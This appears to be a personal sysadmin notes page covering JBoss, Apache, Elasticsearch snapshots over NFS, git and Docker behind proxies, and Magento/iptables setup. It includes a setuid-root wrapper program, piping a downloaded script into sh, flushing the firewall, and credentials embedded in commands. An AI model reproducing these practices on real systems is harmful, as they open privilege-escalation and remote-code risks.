2016-01-05 19:02:29,196 [http-/0.0.0.0:9080-1] INFO stdout - at org.jboss.as.ejb3.remote.LocalEjbReceiver.clone(LocalEjbReceiver.java:295)
2016-01-05 19:02:29,196 [http-/0.0.0.0:9080-1] INFO stdout - at org.jboss.as.ejb3.remote.LocalEjbReceiver.clone(LocalEjbReceiver.java:286)
2016-01-05 19:02:29,196 [http-/0.0.0.0:9080-1] INFO stdout - at org.jboss.as.ejb3.remote.LocalEjbReceiver.processInvocation(LocalEjbReceiver.java:258)
2016-01-05 19:02:29,196 [http-/0.0.0.0:9080-1] INFO stdout - at org.jboss.ejb.client.EJBClientInvocationContext.sendRequest(EJBClientInvocationContext.java:184)
2016-01-05 19:02:29,196 [http-/0.0.0.0:9080-1] INFO stdout - at org.jboss.ejb.client.EJBObjectInterceptor.handleInvocation(EJBObjectInterceptor.java:58)
2016-01-05 19:02:29,197 [http-/0.0.0.0:9080-1] INFO stdout - at org.jboss.ejb.client.EJBClientInvocationContext.sendRequest(EJBClientInvocationContext.java:186)
2016-01-05 19:02:29,197 [http-/0.0.0.0:9080-1] INFO stdout - at org.jboss.ejb.client.EJBHomeInterceptor.handleInvocation(EJBHomeInterceptor.java:83)
2016-01-05 19:02:29,197 [http-/0.0.0.0:9080-1] INFO stdout - at org.jboss.ejb.client.EJBClientInvocationContext.sendRequest(EJBClientInvocationContext.java:186)
2016-01-05 19:02:29,197 [http-/0.0.0.0:9080-1] INFO stdout - at org.jboss.ejb.client.TransactionInterceptor.handleInvocation(TransactionInterceptor.java:42)
2016-01-05 19:02:29,197 [http-/0.0.0.0:9080-1] INFO stdout - at org.jboss.ejb.client.EJBClientInvocationContext.sendRequest(EJBClientInvocationContext.java:186)
2016-01-05 19:02:29,197 [http-/0.0.0.0:9080-1] INFO stdout - at org.jboss.ejb.client.ReceiverInterceptor.handleInvocation(ReceiverInterceptor.java:125)
2016-01-05 19:02:29,197 [http-/0.0.0.0:9080-1] INFO stdout - at org.jboss.ejb.client.EJBClientInvocationContext.sendRequest(EJBClientInvocationContext.java:186)
2016-01-05 19:02:29,197 [http-/0.0.0.0:9080-1] INFO stdout - at org.jboss.ejb.client.EJBInvocationHandler.sendRequestWithPossibleRetries(EJBInvocationHandler.java:255)
2016-01-05 19:02:29,197 [http-/0.0.0.0:9080-1] INFO stdout - at org.jboss.ejb.client.EJBInvocationHandler.doInvoke(EJBInvocationHandler.java:200)
2016-01-05 19:02:29,197 [http-/0.0.0.0:9080-1] INFO stdout - at org.jboss.ejb.client.EJBInvocationHandler.doInvoke(EJBInvocationHandler.java:183)
2016-01-05 19:02:29,197 [http-/0.0.0.0:9080-1] INFO stdout - at org.jboss.ejb.client.EJBInvocationHandler.invoke(EJBInvocationHandler.java:146)
2016-01-05 19:02:29,197 [http-/0.0.0.0:9080-1] INFO stdout - at com.sun.proxy.$Proxy36.getYYSubmission(Unknown Source)
2016-01-05 19:02:29,197 [http-/0.0.0.0:9080-1] INFO stdout - at xx.webservices.esubmission.EsubmissionSkeleton.getYYSubmission(EsubmissionSkeleton.java:64)
2016-01-05 19:02:29,197 [http-/0.0.0.0:9080-1] INFO stdout - at xx.webservices.esubmission.EsubmissionMessageReceiverInOut.invokeBusinessLogic(EsubmissionMessageReceiverInOut.java:51)
2016-01-05 19:02:29,197 [http-/0.0.0.0:9080-1] INFO stdout - at org.apache.axis2.receivers.AbstractInOutSyncMessageReceiver.invokeBusinessLogic(AbstractInOutSyncMessageReceiver.java:42)
2016-01-05 19:02:29,198 [http-/0.0.0.0:9080-1] INFO stdout - at org.apache.axis2.receivers.AbstractMessageReceiver.receive(AbstractMessageReceiver.java:96)
2016-01-05 19:02:29,198 [http-/0.0.0.0:9080-1] INFO stdout - at org.apache.axis2.engine.AxisEngine.receive(AxisEngine.java:145)
2016-01-05 19:02:29,198 [http-/0.0.0.0:9080-1] INFO stdout - at org.apache.axis2.transport.http.util.RESTUtil.invokeAxisEngine(RESTUtil.java:125)
2016-01-05 19:02:29,198 [http-/0.0.0.0:9080-1] INFO stdout - at org.apache.axis2.transport.http.util.RESTUtil.processURLRequest(RESTUtil.java:119)
2016-01-05 19:02:29,198 [http-/0.0.0.0:9080-1] INFO stdout - at org.apache.axis2.transport.http.AxisServlet$RestRequestProcessor.processURLRequest(AxisServlet.java:799)
2016-01-05 19:02:29,198 [http-/0.0.0.0:9080-1] INFO stdout - at org.apache.axis2.transport.http.AxisServlet.doGet(AxisServlet.java:242)
2016-01-05 19:02:29,198 [http-/0.0.0.0:9080-1] INFO stdout - at javax.servlet.http.HttpServlet.service(HttpServlet.java:734)
2016-01-05 19:02:29,198 [http-/0.0.0.0:9080-1] INFO stdout - at javax.servlet.http.HttpServlet.service(HttpServlet.java:847)
2016-01-05 19:02:29,198 [http-/0.0.0.0:9080-1] INFO stdout - at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:295)
2016-01-05 19:02:29,198 [http-/0.0.0.0:9080-1] INFO stdout - at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:214)
2016-01-05 19:02:29,198 [http-/0.0.0.0:9080-1] INFO stdout - at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:231)
2016-01-05 19:02:29,198 [http-/0.0.0.0:9080-1] INFO stdout - at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:149)
2016-01-05 19:02:29,198 [http-/0.0.0.0:9080-1] INFO stdout - at org.jboss.as.jpa.interceptor.WebNonTxEmCloserValve.invoke(WebNonTxEmCloserValve.java:50)
2016-01-05 19:02:29,198 [http-/0.0.0.0:9080-1] INFO stdout - at org.jboss.as.jpa.interceptor.WebNonTxEmCloserValve.invoke(WebNonTxEmCloserValve.java:50)
2016-01-05 19:02:29,199 [http-/0.0.0.0:9080-1] INFO stdout - at org.jboss.as.web.security.SecurityContextAssociationValve.invoke(SecurityContextAssociationValve.java:169)
2016-01-05 19:02:29,199 [http-/0.0.0.0:9080-1] INFO stdout - at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:150)
2016-01-05 19:02:29,199 [http-/0.0.0.0:9080-1] INFO stdout - at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:97)
2016-01-05 19:02:29,199 [http-/0.0.0.0:9080-1] INFO stdout - at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:102)
2016-01-05 19:02:29,199 [http-/0.0.0.0:9080-1] INFO stdout - at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:344)
2016-01-05 19:02:29,199 [http-/0.0.0.0:9080-1] INFO stdout - at org.apache.coyote.http11.Http11Processor.process(Http11Processor.java:854)
2016-01-05 19:02:29,199 [http-/0.0.0.0:9080-1] INFO stdout - at org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler.process(Http11Protocol.java:653)
2016-01-05 19:02:29,199 [http-/0.0.0.0:9080-1] INFO stdout - at org.apache.tomcat.util.net.JIoEndpoint$Worker.run(JIoEndpoint.java:926)
2016-01-05 19:02:29,199 [http-/0.0.0.0:9080-1] INFO stdout - at java.lang.Thread.run(Thread.java:745)

Update method read in class XMLReaderReader from source code of xmlbeans

1
2
3
4
5
6
7
8
9
10
11
12
13
14
if (c >= 0x20) {
if ((c <= 0xD7FF) ||
(c >= 0xE000 && c <= 0xFFFD) ||
(c >= 0x10000 && c <= 0x10FFFF) ||
// bypass surrogate pair character
XMLChar.isHighSurrogate(c) || XMLChar.isLowSurrogate(c)) {

sawCR = false;
destbuf[off+ (charsRead++)] = c;
}
else
throw new IllegalCharException(
"Illegal XML Character: 0x"+Integer.toHexString(c));
}

Call webservice via http again

curl http://10.13.135.37:9080/yy_ws/services/esubmission/getYYSubmission
Result as

1
2
3
4
5
6
7
8
9
10
11
12
This XML file does not appear to have any style information associated with it. The document tree is shown below.
<type:YYSubmissionResponse xmlns:type="http://www.yy.gov.hk/ww/lsexchange/type">
<type:out xmlns:type="http://www.yy.gov.hk/ww/lsexchange/type">
<type:FromDateTime xmlns:type="http://www.yy.gov.hk/ww/lsexchange/type">2016-01-05T19:53:15.159+08:00</type:FromDateTime>
<type:ToDateTime xmlns:type="http://www.yy.gov.hk/ww/lsexchange/type">2016-01-05T19:53:15.159+08:00</type:ToDateTime>
<type:NoOfSubmission xmlns:type="http://www.yy.gov.hk/ww/lsexchange/type">2</type:NoOfSubmission>
<type:eSubmissionList xmlns:type="http://www.yy.gov.hk/ww/lsexchange/type">
<type:eSubmission xmlns:type="http://www.yy.gov.hk/ww/lsexchange/type">𠃙</type:eSubmission>
<type:eSubmission xmlns:type="http://www.yy.gov.hk/ww/lsexchange/type">𠁙</type:eSubmission>
</type:eSubmissionList>
</type:out>
</type:YYSubmissionResponse>

Running apache as a non-root user

sudo

in file sudoers add following
username ALL=NOPASSWD:/usr/bin/service apache2 reload

Run on port 8080 and use iptables to redirect packets

iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to 8080

setuid wrapper program

httpdctrl.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <signal.h>
#include <strings.h>

// allow start/stop/restart of apache by non-root users

int main(int argc, char **argv)
{
char *cmd, *cmd2, *usage;

// UPDATE THIS LINE:
cmd = "/your/path/to/httpd/sbin/apachectl";
cmd2 = "apachectl";
usage = "Usage: COMMAND [start|stop|restart]\n";

if ( argc != 2 ) {
printf(usage);
exit(1);
}

setegid(0);
seteuid(0);
setgid(0);
setuid(0);

if ( strncmp(argv[1], "start", 5) == 0 ) {
if (execl(cmd, cmd2, "start", (char*)0) < 0) {
perror("Error");
}
} else if ( strncmp(argv[1], "stop", 4) == 0 ) {
if (execl(cmd, cmd2, "stop", (char*)0) < 0) {
perror("Error");
}
} else if ( strncmp(argv[1], "restart", 7) == 0 ) {
if (execl(cmd, cmd2, "restart", (char*)0) < 0) {
perror("Error");
}
} else {
printf(usage);
exit(1);
}
exit(0);
}
1
2
3
gcc -o httpdctrl httpdctrl.c
sudo chown root:root httpdctrl
sudo chmod u+s httpdctrl

Run on docker, lxc, runC

docker pull apache

If you only need super-basic stuff on a non-priv port, you could run:

python -m SimpleHTTPServer 8000

Reference

http://stackoverflow.com/questions/525672/is-there-a-way-to-start-restart-stop-apache-server-on-linux-as-non-root-user
http://askubuntu.com/questions/694036/apache-as-non-root
http://serverfault.com/questions/69847/linux-how-to-give-a-user-permission-to-restart-apache
http://www.debian-administration.org/article/386/Running_network_services_as_a_non-root_user

Do Something With ElasticSearch

elasticsearch.yml (node01, node02)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
network.host: $xx
http.port: 9200
transport.tcp.port: 9300
index.number_of_replicas: 1
discovery:
zen:
ping:
multicast.enabled: false
unicast.hosts: ["$yy"]
timeout: "3s"
cluster:
name: es-cluster
node:
name: $zz
path.repo: ["/mount/backups"]

index.search.slowlog.threshold.query.warn: 10s
index.search.slowlog.threshold.query.info: 5s
index.search.slowlog.threshold.query.debug: 2s
index.search.slowlog.threshold.query.trace: 500ms

index.search.slowlog.threshold.fetch.warn: 1s
index.search.slowlog.threshold.fetch.info: 800ms
index.search.slowlog.threshold.fetch.debug: 500ms
index.search.slowlog.threshold.fetch.trace: 200ms

index.indexing.slowlog.threshold.index.warn: 10s
index.indexing.slowlog.threshold.index.info: 5s
index.indexing.slowlog.threshold.index.debug: 2s
index.indexing.slowlog.threshold.index.trace: 500ms

replace vairable in node01 with ($xx=node01, $yy=node2, $zz=es-node01)
replace vairable in node02 with ($xx=node02, $yy=node1, $zz=es-node02)

docker-compose.yml

1
2
3
4
5
6
7
8
9
10
elasticsearch:
build: elasticsearch/
net: "host"
volumes:
- ./elasticsearch/config:/opt/elasticsearch/config:ro
- /var/data:/opt/elasticsearch/data
- /opt/backups/es_backup:/mount/backups
expose:
- "9200"
- "9300"

Install/Configure NFS server and client

In node02 add NFS server

sudo apt-get install nfs-kernel-server
vi /etc/exports to add below setting
/opt/backups/es_backup node01(rw,sync,no_subtree_check)
then run exportfs -ra

In node01 add NFS client

1
2
3
sudo apt-get install nfs-common
midir -p /opt/backups/es_backup
mount node02:/opt/backups/es_backup es_backup

vi /etc/fstab to add below setting
10.13.135.38:/opt/backups/es_backup /opt/backups/es_backup nfs rw,hard,intr 0 0

Restart docker

Run command docker-compose up -d to build and run ES.

Create snapshot in ES with sense

1
2
3
4
5
6
7
8
9
10
PUT _snapshot/logstash_repo
{
"type": "fs",
"settings": {
"compress": "true",
"location": "/mount/backups/logstash_repo",
"max_snapshot_bytes_per_sec" : "50mb",
"max_restore_bytes_per_sec" : "50mb"
}
}

Backup/Restore indices

1
2
3
4
5
6
7
8
9
10
11
12
13
14
PUT _snapshot/logstash_repo/snapshot_20151211
{
"indices": "logstash-2015.12.10,logstash-2015.12.11",
"ignore_unavailable": "true",
"include_global_state": "false"
}

GET /_snapshot/logstash_repo/_all or GET /_snapshot/logstash_repo/snapshot_20151211/_status (Check)

DELETE logstash-2015.12.10,logstash-2015.12.11 (Delete Indice)

POST /_snapshot/logstash_repo/snapshot_20151211/_restore?wait_for_completion (Restore)

DELETE /_snapshot/logstash_repo (Delete Snapshot)

Following command should be remembered

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
GET _cluster/health
or GET _cluster/health?level=indices
or GET _cluster/health?level=shards
or GET _cluster/health?wait_for_status=green

GET _cat/indices

GET logstash-2015.12.09/_settings

GET logstash-2015.12.09/_count

GET logstash-2015.12.09/_mapping

GET logstash-2015.12.16/server-SystemOut/_search?q=message:Exception

GET logstash-2015.12.08/server-SystemOut/_search
{
"query": {
"match": {
"message": "Exception"
}
}
}

GET logstash-2015.12.15/_search?fields=timestamp,host
{
"query": {
"filtered": {
"query": {
"match": {
"message": "Exception"
}
},
"filter": {
"range": {
"@timestamp": {
"gte": 1450212195957,
"lte": 1450265395957,
"format": "epoch_millis"
}
}
}
}
},
"sort": [
{
"@timestamp": {
"order": "asc",
"unmapped_type": "boolean"
}
}
],
"size": 10,
"from": 0,
"fields": ["host","message"]
}

GET logstash-2015.12.15/_search?size=20&fields=message
{
"query": {
"query_string": {
"query": "message : Exception AND type : moon01"
}
}
}

Client API to search ES cluster

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
package dh;

import io.searchbox.client.JestClient;
import io.searchbox.client.JestClientFactory;
import io.searchbox.client.config.HttpClientConfig;
import io.searchbox.core.Search;
import io.searchbox.core.SearchResult;

import java.io.IOException;
import java.util.Calendar;
import java.util.List;

import org.elasticsearch.index.query.QueryBuilder;
import org.elasticsearch.index.query.QueryBuilders;
import org.elasticsearch.search.builder.SearchSourceBuilder;

public class Main {
public static void main(String[] args) throws IOException {
JestClientFactory factory = new JestClientFactory();
factory.setHttpClientConfig(new HttpClientConfig.Builder("http://10.13.135.37:9200").build());
JestClient client = factory.getObject();

SearchSourceBuilder builder = new SearchSourceBuilder();

// single and mutilple criteria
QueryBuilder q1 = QueryBuilders.queryStringQuery("message : Exception AND type : moon01");
QueryBuilder q2 = QueryBuilders.matchQuery("message", "Exception");

long now = System.currentTimeMillis();
Calendar c = Calendar.getInstance();
c.set(Calendar.DAY_OF_MONTH, c.get(Calendar.DAY_OF_MONTH) - 3);
long thatDay = c.getTimeInMillis();

String filtered = builder.query(
QueryBuilders.filteredQuery(QueryBuilders.queryFilter(q2), QueryBuilders.rangeQuery("@timestamp").from(
Long.toString(thatDay)).to(Long.toString(now)).format("epoch_millis"))).sort("@timestamp")
.size(200).from(0).field("_source").toString();

System.out.println("DSL Query " + filtered);

Search search = ((Search.Builder) new Search.Builder(filtered).addIndex("logstash-2015.12.15").addIndex(
"logstash-2015.12.16")).build();
SearchResult result = (SearchResult) client.execute(search);

List<SearchResult.Hit<Log, Void>> hits = result.getHits(Log.class);

int i = 0;
for (SearchResult.Hit<Log, Void> hit : hits) {
i++;
if (hit.source.getWas_message() != null && hit.source.getWas_message().length() > 200) {
System.out.println(i + " " + hit.index + ", " + hit.source.getType() + ", "
+ hit.source.getWas_message().substring(0, 200));
} else {
System.out.println(i + " " + hit.index + ", " + hit.source.getType() + ", "
+ hit.source.getWas_message());
}
}
System.out.println("Total: " + result.getTotal() + ", Hits size: " + hits.size());
}
}

class Log {
private String type;
private String was_message;

public String getType() {
return type;
}

public void setType(String type) {
this.type = type;
}

public String getWas_message() {
return was_message;
}

public void setWas_message(String was_message) {
this.was_message = was_message;
}

}

Software installed in server

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
fun:
cowsay
fortune
sl
jq
banner
toilet
figlet
libaa-bin

utility:
htop
python-pip
atop
sysstat

pip:
paramiko
fabric
elasticsearch

nfs:
nfs-common
nfs-kernel-server

Monitor docker with following technology

Rsyslog
ElasticSearch + Logstash + Kibana
Graphite
Collectd
grafana/grafana
tutum/influxdb
google/cadvisor
Heka
flunted

Reference

https://help.ubuntu.com/community/SettingUpNFSHowTo

ELK-install-in-AIX-and-Windows

curl and wget

Usage of curl and wget

1
2
3
4
curl -sSL -X post --data "keyword=xx" -k -u dhuser:dhpass -x proxyserver:8080 http://abc.com

export http_proxy=proxyserver:8080
wget --no-check-certificate https://dhuser:dhpass@abc.com/logs

git clone ssh behind proxy windows

Git protocal

1
2
3
git://
https://
ssh://

Create repository

git init --bare

Clone repository

git clone user@remote-server:/home/git/repo.git

Clone repository behind a firewall proxy

  • Edit ~/.ssh/config, add following command to it
    1
    2
    ProxyCommand C:/connect-1.104-win32-msvc/connect.exe -H proxyserver:8080 %h %p
    IdentityFile "C:/Users/user/Desktop/id_rsa"
  • Open cygwin, run git clone command above to retrieve repository.

Clone repository by git protocal

  • Install socat, then create a file named gitproxy, its content as below,
    $ sudo vi /usr/bin/gitproxy

    1
    2
    3
    4
    5
    6
    #!/bin/bash

    PROXY=squid.vpsee.com
    PROXYPORT=3128
    PROXYAUTH=username:password
    exec socat STDIO PROXY:$PROXY:$1:$2,proxyport=$PROXYPORT,proxyauth=$PROXYAUTH

    $ git config --global core.gitproxy gitproxy

  • Clone repository
    git clone git://user@remote-server:/home/git/repo.git

http://cms-sw.github.io/tutorial-proxy.html
http://www.vpsee.com/2011/07/how-to-use-git-through-a-http-proxy/
http://www.laurii.info/2013/04/git-ssh-behind-proxy-windows/
http://stackoverflow.com/questions/3248779/which-is-faster-ssh-or-git-protocol

Install Docker on CentOS 6

Update OS

yum update -y

Upgrade kernel 3.10

Check kernel version

uname -r => 2.6.32-279.el6.x86_64

Import ELRepo public keys

1
2
rpm --import https://www.elrepo.org/RPM-GPG-KEY-elrepo.org
rpm -Uvh http://www.elrepo.org/elrepo-release-6-6.el6.elrepo.noarch.rpm

Install kernel

yum --enablerepo=elrepo-kernel install kernel-lt
uname -r => 3.10.90-1.el6.elrepo.x86_64

Configure grub

Change the kernel boot order at /etc/grub.conf, change default from 1 to 0 as below,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
default=0
timeout=5
splashimage=(hd0,0)/grub/splash.xpm.gz
hiddenmenu
title CentOS (3.10.90-1.el6.elrepo.x86_64)
root (hd0,0)
kernel /vmlinuz-3.10.90-1.el6.elrepo.x86_64 ro root=/dev/mapper/VolGroup-lv_root rd_NO_LUKS LANG=en_US.UTF-8 rd_NO_MD console=hvc0 KEYTABLE=us rd_LVM_LV=VolGroup/lv_swap SYSFONT=latarcyrheb-sun16 crashkernel=auto rd_LVM_LV=VolGroup/lv_root rd_NO_DM rhgb quiet
initrd /initramfs-3.10.90-1.el6.elrepo.x86_64.img
title CentOS (2.6.32-573.7.1.el6.x86_64)
root (hd0,0)
kernel /vmlinuz-2.6.32-573.7.1.el6.x86_64 ro root=/dev/mapper/VolGroup-lv_root rd_NO_LUKS LANG=en_US.UTF-8 rd_NO_MD console=hvc0 KEYTABLE=us rd_LVM_LV=VolGroup/lv_swap SYSFONT=latarcyrheb-sun16 crashkernel=auto rd_LVM_LV=VolGroup/lv_root rd_NO_DM rhgb quiet
initrd /initramfs-2.6.32-573.7.1.el6.x86_64.img
title CentOS (2.6.32-279.el6.x86_64)
root (hd0,0)
kernel /vmlinuz-2.6.32-279.el6.x86_64 ro root=/dev/mapper/VolGroup-lv_root rd_NO_LUKS LANG=en_US.UTF-8 rd_NO_MD console=hvc0 KEYTABLE=us rd_LVM_LV=VolGroup/lv_swap SYSFONT=latarcyrheb-sun16 crashkernel=auto rd_LVM_LV=VolGroup/lv_root rd_NO_DM rhgb quiet
initrd /initramfs-2.6.32-279.el6.x86_64.img

Check kernel configuration as a suitable docker host

wget https://raw.githubusercontent.com/docker/docker/master/contrib/check-config.sh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
./check-config.sh
warning: /proc/config.gz does not exist, searching other paths for kernel config ...
info: reading kernel config from /boot/config-3.10.90-1.el6.elrepo.x86_64 ...

Generally Necessary:
- cgroup hierarchy: properly mounted [/cgroup]
- CONFIG_NAMESPACES: enabled
- CONFIG_NET_NS: enabled
- CONFIG_PID_NS: enabled
- CONFIG_IPC_NS: enabled
- CONFIG_UTS_NS: enabled
- CONFIG_DEVPTS_MULTIPLE_INSTANCES: enabled
- CONFIG_CGROUPS: enabled
- CONFIG_CGROUP_CPUACCT: enabled
- CONFIG_CGROUP_DEVICE: enabled
- CONFIG_CGROUP_FREEZER: enabled
- CONFIG_CGROUP_SCHED: enabled
- CONFIG_CPUSETS: enabled
- CONFIG_MEMCG: enabled
- CONFIG_MACVLAN: enabled (as module)
- CONFIG_VETH: enabled (as module)
- CONFIG_BRIDGE: enabled (as module)
- CONFIG_BRIDGE_NETFILTER: enabled
- CONFIG_NF_NAT_IPV4: enabled (as module)
- CONFIG_IP_NF_FILTER: enabled (as module)
- CONFIG_IP_NF_TARGET_MASQUERADE: enabled (as module)
- CONFIG_NETFILTER_XT_MATCH_ADDRTYPE: enabled (as module)
- CONFIG_NETFILTER_XT_MATCH_CONNTRACK: enabled (as module)
- CONFIG_NF_NAT: enabled (as module)
- CONFIG_NF_NAT_NEEDED: enabled
- CONFIG_POSIX_MQUEUE: enabled

Optional Features:
- CONFIG_MEMCG_KMEM: enabled
- CONFIG_MEMCG_SWAP: enabled
- CONFIG_MEMCG_SWAP_ENABLED: missing
(note that cgroup swap accounting is not enabled in your kernel config, you can enable it by setting boot option "swapaccount=1")
- CONFIG_RESOURCE_COUNTERS: enabled
- CONFIG_BLK_CGROUP: enabled
- CONFIG_IOSCHED_CFQ: enabled
- CONFIG_BLK_DEV_THROTTLING: enabled
- CONFIG_CGROUP_PERF: enabled
- CONFIG_CGROUP_HUGETLB: missing
- CONFIG_NET_CLS_CGROUP: enabled
- CONFIG_NETPRIO_CGROUP: enabled (as module)
- CONFIG_CFS_BANDWIDTH: enabled
- CONFIG_FAIR_GROUP_SCHED: enabled
- CONFIG_RT_GROUP_SCHED: enabled
- CONFIG_EXT3_FS: enabled (as module)
- CONFIG_EXT3_FS_XATTR: enabled
- CONFIG_EXT3_FS_POSIX_ACL: enabled
- CONFIG_EXT3_FS_SECURITY: enabled
- CONFIG_EXT4_FS: enabled (as module)
- CONFIG_EXT4_FS_POSIX_ACL: enabled
- CONFIG_EXT4_FS_SECURITY: enabled
- Storage Drivers:
- "aufs":
- CONFIG_AUFS_FS: missing
- "btrfs":
- CONFIG_BTRFS_FS: enabled (as module)
- "devicemapper":
- CONFIG_BLK_DEV_DM: enabled (as module)
- CONFIG_DM_THIN_PROVISIONING: enabled (as module)
- "overlay":
- CONFIG_OVERLAY_FS: missing
- "zfs":
- /dev/zfs: missing
- zfs command: missing
- zpool command: missing

Install Docker

Install epel repository

rpm -iUvh http://dl.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm

Update packages

yum update -y

Install Docker

yum install docker-io

Start docker daemon

service docker start

Configure docker to start when os boots

chkconfig docker on

Test docker

1
2
3
4
5
docker pull busybox
docker pull centos

docker run -i -t busybox /bin/sh
docker run -i -t centos /bin/bash

Install docker-compose

1
curl -L https://github.com/docker/compose/releases/download/1.4.2/docker-compose-`uname -s`-`uname -m` > /usr/local/bin/docker-compose

Test docker-compose from https://docs.docker.com/compose/

Reference

Install Kernel 3.10 on CentOS 6.5
阿里云的Centos 6.5 模板上使用Docker
http://elrepo.org/tiki/tiki-index.php
kernel-lt
How To Install Docker on CentOS 6

Fun with Spring Cloud and microservice


  • Install docker

    1
    2
    3
    export http_proxy=http://192.168.56.1:21
    curl -x 192.168.56.1:21 -sSL https://get.docker.com/gpg | sudo apt-key add -
    curl -x 192.168.56.1:21 -sSL https://get.docker.com/ | sh
  • Clone spring project

    1
    git clone https://github.com/kbastani/spring-cloud-microservice-example --config "http.proxy=http://192.168.56.1:21"

    cd spring-cloud-microservice-example/

  • Install docker-compose

    1
    curl -x http://192.168.56.1:21 -L https://github.com/docker/compose/releases/download/1.4.0/docker-compose-`uname -s`-`uname -m` > /usr/local/bin/docker-compose
  • Install Maven
    wget http://apache.communilink.net//maven/maven-3/3.3.3/binaries/apache-maven-3.3.3-bin.tar.gz
    set proxy and repository path (shared by user and root) in conf/settings.xml

  • Install Gradle
    gradle -Dhttp.proxyHost=192.168.56.1 -Dhttp.proxyPort=21 -Dhttps.proxyHost=192.168.56.1 -Dhttps.proxyPort=21 build

  • Install Java (Refer to http://www.tecmint.com/install-java-jdk-jre-in-linux/ or http://tecadmin.net/install-java-8-on-centos-rhel-and-fedora/)
    Download jdk-8u60-linux-x64.gz

    1
    2
    3
    4
    sudo update-alternatives --install /usr/bin/java java /home/user/Software/jdk1.8.0_60/bin/java 3
    sudo update-alternatives --install /usr/bin/javac javac /home/user/Software/jdk1.8.0_60/bin/javac 3
    sudo update-alternatives --set jar /home/user/Software/jdk1.8.0_60/bin/jar
    sudo update-alternatives --set javac /home/user/Software/jdk1.8.0_60/bin/javac
  • Setup docker proxy
    edit /etc/default/docker to set proxy (/etc/sysconfig/docker in CentOS)
    service docker restart
    or

    1
    2
    sudo HTTP_PROXY=http://192.168.56.1:21/ docker -d &
    sudo usermod -aG docker username

Installed software and component

node_module config

node_module

Config

  • npm

    “C:/program file/node/node_module”

  • cache
    “C://Users//HPUser//AppData//Roaming//npm-cache”
    /home/xx/.npm
  • prefix
    “C://Users//HPUser//AppData//Roaming//npm”
    “/usr/local”
  • userconfig
    “C://Users//HPUser//.npmrc”
    “/home/xx/.npmrc”
  • globalconfig
    “C://Users//HPUser//AppData//Roaming//npm//etc//npmrc”
    “/usr/local/etc/npmrc”
  • tmp
    “C://Users//HPUser//AppData//Local//Temp”
    “/home/xx/tmp”

Show config list

1
2
npm config list
npm config get prefix / set prefix

What stuff has done with Magento

http://devdocs.magento.com/guides/m1x/index.html
http://devdocs.magento.com/guides/m1x/install/installing_install.html
http://merch.docs.magento.com/ce/user_guide/Magento_Community_Edition_User_Guide.html

  • Upgrade system

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    useradd user

    yum update
    yum clean
    yum install yum-utils
    yum-complete-transaction

    yum install php php-mysql
    yum install httpd
    yum install mysql-server
    service mysqld start
    mysql_secure_installation
  • Fix php5.1 upgrade to php5.4w

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    rpm -Uvh http://mirror.webtatic.com/yum/el5/latest.rpm
    yum remove php php-mysql
    yum install yum-plugin-replace
    yum replace php-common --replace-with=php54w-common
    yum install php54w

    yum install php54w-mcrypt
    yum install php54w-gd
    yum install php54w-soap
    yum install php54w-mbstring
    yum install php54w-devel # for phpredis extension
  • disable iptables

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    iptables -F
    http://wiki.centos.org/HowTos/Network/IPTables

    cat /etc/sysconfig/iptables | see the rules

    iptables -A INPUT -p tcp -m state --state NEW -m tcp --dport 21 -j ACCEPT
    iptables -A INPUT -p tcp -m state --state NEW -m tcp --dport 20 -j ACCEPT

    iptables -A INPUT -j RH-Firewall-1-INPUT
    iptables -A FORWARD -j RH-Firewall-1-INPUT
    iptables -A RH-Firewall-1-INPUT -i lo -j ACCEPT
    iptables -A RH-Firewall-1-INPUT -p icmp --icmp-type any -j ACCEPT
    iptables -A RH-Firewall-1-INPUT -p 50 -j ACCEPT
    iptables -A RH-Firewall-1-INPUT -p 51 -j ACCEPT
    iptables -A RH-Firewall-1-INPUT -p udp --dport 5353 -d 224.0.0.251 -j ACCEPT
    iptables -A RH-Firewall-1-INPUT -p udp -m udp --dport 631 -j ACCEPT
    iptables -A RH-Firewall-1-INPUT -p tcp -m tcp --dport 631 -j ACCEPT
    iptables -A RH-Firewall-1-INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
    iptables -A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 22 -j ACCEPT
